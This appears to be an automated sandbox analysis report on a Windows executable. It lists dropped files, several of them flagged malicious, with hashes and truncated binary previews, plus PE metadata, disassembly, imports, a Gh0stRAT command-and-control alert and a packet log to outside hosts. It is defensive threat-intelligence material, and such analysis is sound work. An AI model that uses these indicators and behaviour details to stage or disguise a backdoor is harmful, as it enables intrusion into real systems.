                                                                                          Malicious:false
                                                                                          Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):512
                                                                                          Entropy (8bit):5.186642107139491
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:WcSRpdRdbCrCa2BIDR+syYWRudduXCCA7OdUzW9E40/qcX:URpiMBIDRNyYWRudduXCCigUzWg3
                                                                                          MD5:A1CC6E3DD3069453BEF8913F9698C666
                                                                                          SHA1:2A3E6F584700A78F1C1691238F9673CBCA8084FD
                                                                                          SHA-256:4BF6D36A529FD1214D07E344298AF465AA7D764CA2BDBBA4B3D7C070B3CE25F9
                                                                                          SHA-512:76A43622E6FDF6DE22F3EAC452F378C809FC28B84CA76774818BD8ACD9C2AC352085BE0F721B661978B0B98A4B87AEBC8C4ED6815C48FC271992094EE75BE57D
                                                                                          Malicious:false
                                                                                          Preview:....l%00...X>?v7DD.T:y61X[X_8q>3ZJF]>.s>QS._q86999999999999999999999999999999999QMMI:sffPPT.hi a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33...[=<u4GG.W9z52[X[\;r=0YIE^=-p=RP.^p97888888888888888888888888888888888PLLH;rggQQU.ih!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):3889557
                                                                                          Entropy (8bit):7.9999387567935285
                                                                                          Encrypted:true
                                                                                          SSDEEP:98304:FAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:andLOZS/DtpPJRO8OHBL4f2UQI+A
                                                                                          MD5:DE044C481A72F459A1FCB638B4E59263
                                                                                          SHA1:5B49B9A644CC9AC381837E05FC86F0BA7020F728
                                                                                          SHA-256:52A1541218DAB5A01C2B7F1C45B808807408A7D1F46185503B2A573BB2C00EF2
                                                                                          SHA-512:DC9AA75D4282EA3120D5C3A36693765A1B187DF25839065B6F83F9B15AC8D820F237DC2D373DCB3D3D90578F8579DBF20792494248947988D9702C02A16BE1B7
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:GIF image data, version 89a, 10 x 10
                                                                                          Category:dropped
                                                                                          Size (bytes):8228
                                                                                          Entropy (8bit):7.978936157803007
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:5Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:5BuNhyTlBU2dp+1XrBuCgp9vU0l
                                                                                          MD5:F6AC0866B12243EEE636C9A6ED87740B
                                                                                          SHA1:99407FA0073BA660C1E1CE6889FC50D9F0F6E106
                                                                                          SHA-256:F30A248C003183C43577BAD6A115F2929A9A2807B1F3FCF29DD12425BF731E38
                                                                                          SHA-512:88F94EF8699FFDCCD5C873D0642402A78F272C34C7CFAF6914D8CF02442C8CECA1AB5EC73F88E08481E12DFA3AE1487146F377AA6F7286646DD6B0F9E1D85263
                                                                                          Malicious:false
                                                                                          Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):133136
                                                                                          Entropy (8bit):6.350273548571922
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                                                          MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                          SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                                                          SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                                                          SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):122880
                                                                                          Entropy (8bit):6.002082912042394
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fz:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gz
                                                                                          MD5:71DAABA939A35FABA25DB29B07A9EB0A
                                                                                          SHA1:B0966F7786EBB99550B490929D30F22D6C1FC012
                                                                                          SHA-256:CB434218E934899250A6C468B954AC928C41C6B27B2ECB9CB9EFE533116A0B55
                                                                                          SHA-512:D7744A70D904ED031463F10F9607ACDABBDBA3E3BB05E14620C1D67F6DB0F52878E7BD3D5B2FFFBFDE86780CD708A10C7926BB1FFE5F36DC5542C03A2DD3FB4B
                                                                                          Malicious:true
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):28272
                                                                                          Entropy (8bit):6.228885003597689
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:H3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/0:HOUkgfdZ9pRyv+uPzCMHo3q4tDghy
                                                                                          MD5:4885B35CEFB232C990702F79012875CC
                                                                                          SHA1:C68D09A3528E0F39524B20CC16E161D19A2D584A
                                                                                          SHA-256:ED6E0D87074397B3FFCC37DDDD8037528C259FE64E838939D71A08A9EFC9665E
                                                                                          SHA-512:AA625B1EA3BC89282D2B2F8B43E4E077858A6004D9976D5622E5D3604A0905B19BF6AEEE55A711358238066D80D8547C7DE94AEF8749826C6B0C1FAB9B74D860
                                                                                          Malicious:true
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l..........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:y:y
                                                                                          MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                          SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                          SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                          SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                          Malicious:false
                                                                                          Preview:..
                                                                                          Process:C:\Program Files (x86)\byHW9q\byHW9q.exe
                                                                                          File Type:GLS_BINARY_LSB_FIRST
                                                                                          Category:dropped
                                                                                          Size (bytes):296
                                                                                          Entropy (8bit):4.4476459429341855
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ri9LH9vl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsljti4vv2lKsXmAUWKznl6:ri9LbTwPYtyjtOsJQ4GEsXmGoi/vL
                                                                                          MD5:CA87F207893F75010994228898C73551
                                                                                          SHA1:CA58C747F52978584BF8D38DCF8579DB911D929D
                                                                                          SHA-256:5B42D55FB0CBEF62CF9F3C1DB19145916A2305D5B810AA3BE64BC9B5D5A0DD6A
                                                                                          SHA-512:7E81FF116DE58A24A9DA2C28F86288059753ABE372730407DEA3A2ECDB538104C22651DF8A3BA2071C3309FA6B63AC530163F626CB11FA9750DC200B0F894032
                                                                                          Malicious:false
                                                                                          Preview:..........8.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP............./.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ.... ....?7.y..|...
                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Entropy (8bit):0.08370096109724737
                                                                                          TrID:
                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:2976587-987347589.08.exe
                                                                                          File size:30'887'936 bytes
                                                                                          MD5:3f0d4ac83e0bec29aebc666ff027a5d6
                                                                                          SHA1:0e8432e8855e31eca680181b961852deaba74ee8
                                                                                          SHA256:857bcee55a11cc0dd14006a38bd0ca0a8d7f88ea6018219b55ff797cddccea95
                                                                                          SHA512:49ed733c32e8bfef970fd1a33d71905c51be82f6afd6aa6a573464f5d8a8c14d01af79cf9a98a2dbdaa8b977cfcc739fd987814feb251c54dc8a2f96658d317f
                                                                                          SSDEEP:3072:654rQk5rIYRl8YLiVeUeqH+WEwugQyXY2YHFkc1e5evFBDwRucQyTvRBsmuB:I4rUKDLiVeUhEFeYHt1e5evDw/K
                                                                                          TLSH:F767AD1B77E070F9E1B69678C8125649D772B8331731AB9F03A44286DF376D18D3AB22
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X.E.X.E.X.E.:.D.X.E.:.D.X.E.:.D"X.E...D.X.E...D.X.E...D.X.E...E.X.E.X.E.X.E5..D.X.E5..D.X.ERich.X.E........PE..d...%IWe...
                                                                                          Icon Hash:338ed4d4a2726922
                                                                                          Entrypoint:0x140004988
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x140000000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x65574925 [Fri Nov 17 11:06:13 2023 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:6
                                                                                          OS Version Minor:0
                                                                                          File Version Major:6
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:6
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:0f7cdde37f1462484539e0138cfa1fe2
                                                                                          Instruction
                                                                                          dec eax
                                                                                          sub esp, 28h
                                                                                          call 00007F9EC4D90FD8h
                                                                                          dec eax
                                                                                          add esp, 28h
                                                                                          jmp 00007F9EC4D8D240h
                                                                                          int3
                                                                                          int3
                                                                                          jmp 00007F9EC4D93480h
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          inc eax
                                                                                          push ebx
                                                                                          dec eax
                                                                                          sub esp, 20h
                                                                                          dec eax
                                                                                          mov ebx, ecx
                                                                                          jmp 00007F9EC4D90B83h
                                                                                          dec eax
                                                                                          mov ecx, ebx
                                                                                          call 00007F9EC4D93486h
                                                                                          test eax, eax
                                                                                          jne 00007F9EC4D90B74h
                                                                                          dec eax
                                                                                          cmp ebx, FFFFFFFFh
                                                                                          jne 00007F9EC4D90B69h
                                                                                          call 00007F9EC4D914E7h
                                                                                          jmp 00007F9EC4D90B67h
                                                                                          call 00007F9EC4D914C0h
                                                                                          dec eax
                                                                                          mov ecx, ebx
                                                                                          call 00007F9EC4D934CCh
                                                                                          dec eax
                                                                                          test eax, eax
                                                                                          je 00007F9EC4D90B37h
                                                                                          dec eax
                                                                                          add esp, 20h
                                                                                          pop ebx
                                                                                          ret
                                                                                          inc eax
                                                                                          push ebx
                                                                                          dec eax
                                                                                          sub esp, 20h
                                                                                          dec eax
                                                                                          mov ebx, ecx
                                                                                          xor ecx, ecx
                                                                                          call dword ptr [0000A6CFh]
                                                                                          dec eax
                                                                                          mov ecx, ebx
                                                                                          call dword ptr [0000A6BEh]
                                                                                          call dword ptr [0000A6C8h]
                                                                                          dec eax
                                                                                          mov ecx, eax
                                                                                          mov edx, C0000409h
                                                                                          dec eax
                                                                                          add esp, 20h
                                                                                          pop ebx
                                                                                          dec eax
                                                                                          jmp dword ptr [0000A6BCh]
                                                                                          dec eax
                                                                                          mov dword ptr [esp+08h], ecx
                                                                                          dec eax
                                                                                          sub esp, 38h
                                                                                          mov ecx, 00000017h
                                                                                          call 00007F9EC4D9A0BCh
                                                                                          test eax, eax
                                                                                          je 00007F9EC4D90B69h
                                                                                          mov ecx, 00000002h
                                                                                          int 29h
                                                                                          dec eax
                                                                                          lea ecx, dword ptr [00014FF7h]
                                                                                          call 00007F9EC4D90C0Fh
                                                                                          dec eax
                                                                                          mov eax, dword ptr [esp+38h]
                                                                                          dec eax
                                                                                          mov dword ptr [000150DEh], eax
                                                                                          dec eax
                                                                                          lea eax, dword ptr [esp+38h]
                                                                                          Programming Language:
                                                                                          • [C++] VS2015 UPD3.1 build 24215
                                                                                          • [LNK] VS2015 UPD3.1 build 24215
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x177340x64.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d760000x4abc.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d740000xcc0.pdata
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d7b0000x630.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x165d00x54.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x166300x94.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xf0000x2a8.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000xd3500xd400042ff524705fa2abd71cba2c4f95f8feFalse0.5641214622641509data6.363076025733495IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0xf0000x904e0x9200909112f6547c8c223b9d09d4e73580ceFalse0.4260755565068493data4.707335187064855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x190000x1d5ac680x1d58200ab2455c660e8e10120efea481bddb2e9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .pdata0x1d740000xcc00xe00f0027954b09b335b4fb4c14137971ffdFalse0.44363839285714285data4.49612119040806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .gfids0x1d750000xc40x200bdbf77d4bf01cbf4f15fd100a268f74cFalse0.21875Matlab v4 mat-file (little endian) q, numeric, rows 10, columns 13, imaginary0.9798152519205301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x1d760000x4abc0x4c00c3521f000215b739b35a6f6b2ba17189False0.9590357730263158data7.924423626369639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x1d7b0000x6300x8000c3c3adbfa1d7560de091d1d1029dad6False0.537109375data4.797113422033704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x1d761180x490dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9856692155499706
                                                                                          RT_RCDATA0x1d7aa280x7cdataEnglishUnited States0.6370967741935484
                                                                                          RT_RCDATA0x1d7aaa40x2dataEnglishUnited States5.0
                                                                                          RT_GROUP_ICON0x1d7aaa80x14dataEnglishUnited States1.05
                                                                                          DLLImport
                                                                                          KERNEL32.dllGetFileAttributesW, CloseHandle, GetLastError, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, SizeofResource, LoadLibraryW, FindResourceW, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, VirtualAlloc
                                                                                          USER32.dllwsprintfW, MessageBoxW
                                                                                          SHELL32.dllShellExecuteExW
                                                                                          SHLWAPI.dllPathCombineW, PathRemoveFileSpecW, PathCanonicalizeW
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2025-01-11T04:45:15.425167+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.9499878.217.47.1698917TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 11, 2025 04:43:41.524554968 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:41.524669886 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:41.524779081 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:41.545171976 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:41.545223951 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:42.797276974 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:42.797369957 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:42.798367977 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:42.798443079 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:42.863233089 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:42.863249063 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:42.863790035 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:42.866013050 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:42.867485046 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:42.911351919 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:43.187978983 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:43.188108921 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:43.188133955 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:43.188169003 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:43.195024967 CET49973443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:43.195049047 CET4434997339.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:43.316402912 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:43.316507101 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:43.316615105 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:43.316942930 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:43.316976070 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.573102951 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.573183060 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.576857090 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.576865911 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.576911926 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.576915979 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.907015085 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.907044888 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.907180071 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.907247066 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.907330036 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.907586098 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.907651901 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.910629034 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.910722971 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.912867069 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.912964106 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.997591019 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.997747898 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.997782946 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.997843027 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.997920990 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.997988939 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.998308897 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.998409986 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.999435902 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.999500036 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:44.999804974 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:44.999871016 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:45.001210928 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:45.001276970 CET49974443192.168.2.939.103.20.105
                                                                                          Jan 11, 2025 04:43:45.012204885 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:45.012294054 CET4434997439.103.20.105192.168.2.9
                                                                                          Jan 11, 2025 04:43:45.012294054 CET49974443192.168.2.939.103.20.105
